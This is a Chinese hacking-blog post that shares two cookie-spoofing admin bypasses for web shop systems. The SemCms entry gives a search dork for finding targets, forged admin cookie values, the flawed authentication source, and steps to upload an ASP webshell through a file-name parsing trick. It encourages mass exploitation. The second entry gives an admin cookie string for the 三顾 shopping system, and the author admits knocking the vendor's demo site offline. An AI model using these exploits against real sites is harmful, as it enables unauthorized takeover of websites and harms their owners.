浏览模式: 标准 | 列表Tag:cookie

SemCms后台cookie欺骗漏洞

Submitted by admin
2011, March 27, 12:10 AM

Google关键字:inurl:P_view asp?pid=

漏洞文件:Clkj_Inc\WebOut.asp

发现日期:2011/03/26

FROM http://www.st999.cn/blog

利用cookies:username=uname=admin;userpas=upas=admin;

打开啊D注入工具或者其他的可以修改cookie的工具,修改成以上的cookies,再登录后台Clkj_Admin/nimda_admin.asp,广告管理,上传图片,有个自定义图片名称的功能,输入st999.asp;.再上传,右键查看源码,拿到shell地址就OK了。

 

漏洞文件的源码:

WebOut.asp

<%
if trim(request.cookies("username")("uname"))<>"" then
       session("username")=request.cookies("username")("uname")
       session("userpas")=request.cookies("userpas")("upas")
else if trim(session("username"))="" or trim(session("userpas"))=""  then
     Response.Write "<script language='javascript'>alert('用户名与密码为空请重新进入!');top.location.href='index.html';</script>"
end if
end if
%>
<script src="
http://www.sem-cms.com/huidiao.asp?url=<%=Request.ServerVariables("SERVER_NAME")%>"></script>

 

看了源码,诸君都了解了吧

喜欢批量的朋友速度吧。。。

我试了下,貌似是通杀以前的版本的。。。。。

 

Tags: semcms, cookie

FROM http://www.st999.cn/blog

程序:三顾购物系统化妆品版 v1.0 

其他版本未试 

刚刚在官方演示站上搞,进了后台要拿shell,结果备份数据那儿搞错了,晕,官方被我搞挂了,不试了,小小漏洞一枚,送给大家了。

 

cookies:    ASPSESSIONIDAACBDCBQ=BMAFNPMBNLDEFDHHLGPCDMJL; www3gushopcom=admin=admin; OrderBy; ShowType; prodpage=1

Tags: 三顾, cookie